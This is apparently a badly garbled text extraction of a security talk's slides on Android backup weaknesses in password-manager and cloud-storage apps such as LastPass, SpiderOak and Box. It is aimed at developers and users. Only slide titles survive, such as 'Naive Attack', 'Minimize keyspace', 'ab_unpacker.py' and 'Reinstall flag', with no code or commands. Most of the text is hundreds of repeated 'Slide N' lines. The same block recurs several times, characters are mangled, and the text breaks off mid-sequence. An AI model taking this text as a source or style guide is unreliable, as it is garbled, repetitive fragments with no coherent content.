Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology
















